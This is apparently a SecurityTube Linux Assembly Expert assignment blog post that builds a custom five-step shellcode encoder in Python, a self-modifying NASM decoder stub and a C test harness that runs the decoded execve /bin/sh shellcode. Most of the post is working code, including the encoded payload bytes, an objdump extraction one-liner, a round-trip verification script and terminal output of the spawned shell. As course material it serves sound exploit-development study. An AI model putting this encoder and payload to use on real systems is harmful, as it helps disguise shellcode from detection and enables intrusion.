• Create a custom encoding scheme like the “Insertion Encoder” we showed you
  • PoC with using execve-stack as the shellcode to encode with your schema and execute


So for our 4th assignment we need to create a custom encoder and then a decoder stub in assembly that decrypts the encoded payload and executes our shellcode. For this I will be using a XANAX encoding scheme, named after its five steps:

  • Xor
  • Add
  • Not
  • Add
  • Xor

First we will write an encoder in python followed by the decoder in assembly.


# Python Xanax Encoder
# SLAE Assignment 4

# Execve Shellcode (25 bytes; a bytes literal so bytearray() accepts it on Python 2 and 3)
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""    # C-style "\x.." string for the test program
encoded2 = ""   # NASM-style 0x..,0x.. list for the decoder stub

# Variables (they must match the constants used in the decoder stub)
xor1 = 0xaa
add1 = 0x01
add2 = 0x08
xor2 = 0x35

print('Encoded shellcode ...')

for x in bytearray(shellcode):
    # XOR
    x = x ^ xor1
    # Add (mask to one byte, as the add in the decoder stub wraps at 0xff)
    x = (x + add1) & 0xff
    # Not
    x = ~x
    x = x & 0xff # Convert to positive
    # Add2 (masked again so a carry past 0xff cannot produce a 3-digit hex value)
    x = (x + add2) & 0xff
    # XOR2
    x = x ^ xor2
    encoded += '\\x'
    encoded += '%02x' % x
    encoded2 += '0x'
    encoded2 += '%02x,' % x

print(encoded)
print(encoded2)
print('Len: %d' % len(bytearray(shellcode)))

The one small gotcha in the code is the not operation, which produces a negative value in Python, hence the additional line masking with 0xff to get a positive byte. Now that we have our encoded shellcode from running the Python encoder, we move on to creating a decoder stub in assembly to decrypt and run it.

suls@ubuntu:~/myslae/SLAE/Assignment-4$ python 
Encoded shellcode ...
Len: 25


; Filename: xanax-decoder.nasm
; Website:
; Purpose: xanax decoder stub in assembly

global _start

section .text
_start:
    jmp short call_shellcode

decoder:
    pop esi             ; pop shellcode address into esi
    xor ecx, ecx        ; clear ecx
    mov cl, 25          ; counter: number of encoded bytes

decode:
    ; Xanax decoder (NB: reverse order of our python encoder, sub instead of add)
    xor byte [esi], 0x35
    sub byte [esi], 0x08
    not byte [esi]
    sub byte [esi], 0x01
    xor byte [esi], 0xaa
    inc esi             ; advance to the next byte
    loop decode         ; decrement ecx and loop while it is not zero
    ; Otherwise jump to our decoded shellcode
    jmp short EncodedShellcode

call_shellcode:
    call decoder        ; pushes the address of EncodedShellcode, which decoder pops
    EncodedShellcode: db 0x5e,0xa9,0x39,0x71,0xb4,0xb4,0x18,0x71,0x71,0xb4,0x0b,0x76,0x77,0xd6,0x88,0x39,0xd6,0x8b,0x38,0xd6,0x8e,0xd9,0x50,0xaa,0xe9

The assembly is fairly straightforward: we use the jmp-call-pop technique to retrieve the address of our shellcode, then a simple loop runs the decoding function over each byte. The only small and obvious issue I ran into here was that you need to subtract rather than add the two values we added in our encoding routine. Note that the stub rewrites its own bytes in place, so the section it lives in must be writable as well as executable: as a standalone ELF that means linking with a writable text segment (for example `ld -N`), while in the C test program further down the array sits in writable data. We then assemble and link the assembly code.
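Before assembling the stub it is worth checking that the decode order really mirrors the encoder and that the encoded bytes are clean. The following is an added example, not code from the original post: a Python 3 round-trip test that re-implements the five encoder steps and the five decoder-stub steps (reverse order, sub instead of add, every intermediate reduced modulo 256 as a byte in memory would be), confirms the encoded bytes equal those in the stub's `db` line and that decoding gives back the execve-stack shellcode, and lists any null bytes, which would truncate the C-string harness. It goes slightly beyond the post in one respect: a byte where the second add carries past 0xff (input 0x55, for instance) is masked back to one byte, which an encoder must do to avoid emitting a three-digit hex value. The function names (`xanax_encode`, `xanax_decode`, `bad_bytes`, `as_c_string`, `as_nasm_db`) are my own.

```python
# Added example (not from the original post): round-trip check for the XANAX scheme.

# Constants from the post; they must match the decoder stub.
XOR1, ADD1, ADD2, XOR2 = 0xAA, 0x01, 0x08, 0x35

# execve-stack shellcode from the post (25 bytes)
SHELLCODE = bytes([
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e,
    0x89, 0xe3, 0x50, 0x89, 0xe2, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80,
])

# Encoded bytes as they appear in the stub's db line in the post
ENCODED_IN_STUB = bytes([
    0x5e, 0xa9, 0x39, 0x71, 0xb4, 0xb4, 0x18, 0x71, 0x71, 0xb4, 0x0b, 0x76, 0x77,
    0xd6, 0x88, 0x39, 0xd6, 0x8b, 0x38, 0xd6, 0x8e, 0xd9, 0x50, 0xaa, 0xe9,
])


def xanax_encode(data):
    """Xor, add, not, add, xor; every result kept to one byte (mod 256)."""
    out = bytearray()
    for b in data:
        b ^= XOR1
        b = (b + ADD1) & 0xFF
        b = (~b) & 0xFF          # not: the mask turns Python's negative int into a byte
        b = (b + ADD2) & 0xFF    # mask here too, otherwise 0xf8..0xff would carry past a byte
        b ^= XOR2
        out.append(b)
    return bytes(out)


def xanax_decode(data):
    """Mirror of the decoder stub: reverse order, sub wherever the encoder added."""
    out = bytearray()
    for b in data:
        b ^= XOR2
        b = (b - ADD2) & 0xFF
        b = (~b) & 0xFF
        b = (b - ADD1) & 0xFF
        b ^= XOR1
        out.append(b)
    return bytes(out)


def bad_bytes(data, bad=(0x00,)):
    """Offsets of bytes that would break the C harness (strlen stops at NUL)."""
    return [i for i, b in enumerate(data) if b in bad]


def as_c_string(data):
    """Render bytes as the "\\x.." string pasted into the C test program."""
    return '"' + ''.join('\\x%02x' % b for b in data) + '"'


def as_nasm_db(data):
    """Render bytes as the db line used in the decoder stub."""
    return 'db ' + ','.join('0x%02x' % b for b in data)


if __name__ == '__main__':
    enc = xanax_encode(SHELLCODE)
    print('matches stub :', enc == ENCODED_IN_STUB)
    print('round trip   :', xanax_decode(enc) == SHELLCODE)
    print('bad bytes at :', bad_bytes(enc))
    print(as_c_string(enc))
    print(as_nasm_db(enc))
```

If the round-trip check fails after you change a constant in one place, the two stages have drifted apart; the stub's `db` line and the `xor`/`sub` immediates must be regenerated together.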

suls@ubuntu:~/myslae/SLAE/Assignment-4$ ./ xanax-decoder
[+] Assembling with Nasm ... 
[+] Linking ...
[+] Done!

Extract the shellcode for the decoder stub and our encoded shellcode:

suls@ubuntu:~/myslae/SLAE/Assignment-4$ objdump -d ./xanax-decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' 

Create a test program in C:


#include <stdio.h>
#include <string.h>

/* decoder stub + encoded payload, as produced by the objdump one-liner above */
unsigned char code[] = \
"PASTE-OBJDUMP-OUTPUT-HERE"; /* placeholder: replace with the extracted "\x.." string */

int main()
{
	printf("Shellcode Length:  %d\n", (int)strlen((char *)code));
	int (*ret)() = (int(*)())code;
	ret();
	return 0;
}

Compile and run the code to prove our decoder stub correctly decodes our encoded shellcode and executes the decoded execve-stack shellcode. The printed length of 56 bytes (31 bytes of decoder stub plus the 25-byte encoded payload) also confirms that neither part contains a null byte, since strlen() would otherwise have stopped early.

suls@ubuntu:~/myslae/SLAE/Assignment-4$ gcc -fno-stack-protector -z execstack -oxanax-decoder-test xanax-decoder-test.c 
xanax-decoder-test.c:8:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
suls@ubuntu:~/myslae/SLAE/Assignment-4$ ./xanax-decoder-test
Shellcode Length:  56
$ id
uid=1000(suls) gid=1000(suls) groups=1000(suls),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ exit

This completes assignment four; the source code is available on GitHub.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-1436
